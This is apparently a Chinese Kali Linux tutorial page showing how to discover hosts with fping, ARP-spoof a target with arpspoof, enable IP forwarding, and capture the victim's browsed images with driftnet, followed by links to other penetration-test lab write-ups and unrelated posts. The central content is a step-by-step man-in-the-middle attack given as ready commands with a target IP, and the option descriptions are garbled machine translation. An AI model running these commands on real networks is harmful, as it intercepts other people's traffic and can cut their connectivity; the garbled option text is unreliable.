需要用到 fping工具 用-asg参数

调查选项:

-4,ipv4只能ping ipv4地址

-6——ipv6只在ping ipv6地址

-b——大小=字节数量的ping数据以字节的方式发送(默认为:56)

-B——backoff=N设置指数backoff因子到N(默认值:1。5)

——count=N计数模式:向每个目标发送N个ping信号

-f文件=文件读取目标文件的文件列表(-表示stdin)

-g——生成生成目标列表(只有在没有-f指定的情况下)

(在目标列表中给出开始和结束IP,或者是CIDR地址)

(例如,fping-g 192.168.1.0 192.168.1.255或fping-g 192.168.1.0/24)

-H,ttl=N设置了IP ttl值(用于实时跳转的时间)

——iface=iface绑定到一个特定的接口

-l——循环循环模式:永远发送ping信号

-m,全部使用提供主机名的ip(如IPv4和IPv6),使用-A

-dontfrag设置了不分段标记

-O-tos=N在ICMP包中设置了服务的类型(tos)标志

-p,-周期=MSEC间隔到一个目标(在ms)

(在循环和计数模式中,默认值:1000毫秒)

-r,重试=N的重试次数(默认值:3)

-R——随机随机分组数据(用来挫败链接数据压缩)

-S-src=IP集源地址

-t,-超时=MSEC单独的目标初始超时(默认为500毫秒,

除了-l/-c/-c,它是-p期到2000毫秒)

输出选项:

-a,活着的目标是活着的

-A-addr通过地址显示目标

-C,vcount=N和-C,以详细格式报告结果

——在每个输出行之前,时间戳打印时间戳

-e——在返回的包中运行的时间

-i-间隔=MSEC间隔发送ping包(默认值:10毫秒)

-n,名称以名称显示目标(-d是等价的)

-N-netdata输出可兼容netdata(-l-Q是必需的)

-o-停机显示了累计的宕机时间(丢失的包包间隔)

-q-安静的安静(不要显示每一个目标/每平的结果)

-Q-s=SECS与-Q相同,但每n秒显示一次

-s,统计打印最终数据

-u-无法到达的目标是无法到达的

- v,版本显示的版本

查看你扫描到的ip

开启arp欺骗用 arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

选项

- i 指定要使用的接口。

- c的主机| |

在恢复arp映射时指定使用哪个硬件地址

成形;在清理时,可以用自己的包发送数据包

地址和主机地址。发送的数据包

一个虚假的hw地址会破坏与某些特定的连接

转换/ap/桥配置,但是它更可靠

而不是使用自己的地址,这是arps的默认方式

事后清理。

- t目标

指定一个特定的主机到ARP毒药(如果没有指定的话

局域网主机)。重复指定多个主机。

-r毒害两个主机(主机和目标)以捕获两者的通信量

的方向。(只在与-t的联合中有效)

主机指定要截获数据包的主机(通常是

本地网关)。

反馈成功后靶机断网(arp攻击)

关掉进程

开启本地的ip转发

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

在进行(arp欺骗) arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

目标可以上网

使用root@kali:~# driftnet -i eth0 工具查看靶机浏览的图片信息

选项:

-h显示这个帮助信息。

- v详细操作。

- b当一个新图像被捕获时,b蜂鸣。

-i接口选择要监听的接口(默认:所有

接口)。

-f文件而不是监听接口,读取捕获

来自pcap转储文件的数据包;文件可以是命名管道

用于与Kismet或相似的用途。

-p不把监听接口设置为混乱模式。

辅助模式:不要在屏幕上显示图像,而是保存

将它们放到一个临时目录中,并在上面公布它们的名称

标准输出。

在临时目录中保存的图像的最大数量

在兼职模式。

-d目录使用指定的临时目录。

-x前缀在保存图像时使用。

-s尝试从网络中提取音频数据,

除了图像。目前,这支持MPEG数据

只有。

-S提取音频流,而不是图像。

-M命令使用给定的命令来播放MPEG音频数据

s选项;这应该处理MPEG帧

提供的标准输入。默认值:“mpg123——”。

主要参数:

-b               捕获到新的图片时发出嘟嘟声

-i  interface     选择监听接口

-f  file   读取一个指定pcap数据包中的图片

-p  不让所监听的接口使用混杂模式

-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

-m number 指定保存图片数的数目

-d directory  指定保存图片的路径

-x prefix  指定保存图片的前缀名

使用举例:

1.实时监听: driftnet -i wlan0

2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

kali之获取靶机的图片和看的url的更多相关文章

  1. kali渗透综合靶机(一)--Lazysysadmin靶机

    kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...

  2. kali渗透综合靶机(十五)--Breach-1.0靶机

    kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...

  3. iOS检测用户截屏并获取所截图片

    iOS检测用户截屏并获取所截图片 微信可以检测到用户截屏行为(Home + Power),并在稍后点击附加功能按钮时询问用户是否要发送刚才截屏的图片,这个用户体验非常好.在iOS7之前, 如果用户截屏 ...

  4. IOS: 使用imageIO获取和修改图片的exif信息

    使用imageIO获取和修改图片的exif信息 一幅图片除了包含我们能看见的像素信息,背后还包含了拍摄时间,光圈大小,曝光等信息.UIImage类将这些细节信息都隐藏了起来,只提供我们关心的图片尺寸, ...

  5. 使用jquery获取网页中图片的高度——解惑

    jQuery获取网页中图片的高度 使用jquery获取网页中图片的高度其实很简单,有两种常用的方法都可以打到我们的目的 $("img").whith();(返回纯数字) $(&qu ...

  6. kali渗透综合靶机(十八)--FourAndSix2靶机

    kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...

  7. kali渗透综合靶机(十二)--SickOs1.2靶机

    kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一.主机发现 1.netdiscover ...

  8. kali渗透综合靶机(十)--Raven靶机

    kali渗透综合靶机(十)--Raven靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate=1000 ...

  9. kali渗透综合靶机(八)--Billu_b0x靶机

    kali渗透综合靶机(八)--Billu_b0x靶机 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip 一.主机发现 1.netdisco ...

随机推荐

  1. ListCtrl 控件数据动态改动

    參考文章:ListCtrl 控件数据动态改动 watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdTAxMDIzNjU1MA==/font/5a6L5L2T/f ...

  2. SJTU 1319. countColors

    题目描写叙述 知道 psypaint 怎么用吗?在巫女系统全面普及的未来世界.非常少人会知道 psypaint 的使用方法. 而身处在公安局作为监视官的朱同学.为了办案须要研究起了 psypaint ...

  3. 管理ONS(Oracle Notification Service)

    Onsctl Onsctl这个命令是用来管理ONS(Oracle Notification Service)是OracleClustser实现FAN Event Push模型的基础. Oracle N ...

  4. js控制textarea输入字符串的个数,鼠标按下抬起推断输入字符数

    [Html代码] <table> <tr> <td width="150">短信内容:</td> <td> <te ...

  5. BZOJ5042: LWD的分科岛

    [传送门:BZOJ5042] 简要题意: 给出n个数,q个询问,每个询问输入opt,l,r,如果opt=1,则输出l到r中的最小值,否则输出最大值 题解: 直接上ST表,自信一波,结果 MLE??好吧 ...

  6. dig linux下的使用

    一般来说linux下查询域名解析有两种选择,nslookup或者dig,而在使用上我觉得dig更加方便顺手. 如果是在debian下的话,只要装上dnsutils这个包就可以使用dig命令了. 最基本 ...

  7. [学习笔记]node.js中的path.extname方法

    path.extname 返回path路径文件扩展名,如果path以 ‘.' 为结尾,将返回 ‘.',如果无扩展名 又 不以'.'结尾,将返回空值. path.extname('index.html' ...

  8. TYVJ 1340 折半暴搜+二分

    思路: 1. 这 题 不卡常过不去啊-- (先加一个random_shuffle) 首先 我们可以折半 搜这一半可以到达的重量 sort一遍 然后搜另一半 对于路程中每一个解 我们可以二分前一半中加这 ...

  9. Perceptron Learning Algorithm(python实现)

    一.概论 对于给定的n维(两种类型)数据(训练集),找出一个n-1维的面,能够"尽可能"地按照数据类型分开.通过这个面,我们可以通过这个面对测试数据进行预测. 例如对于二维数据,要 ...

  10. ora_tool

    #!/bin/ksh # # Copyright (c) 1998, 2002, Oracle Corporation.  All rights reserved. #   version() {   ...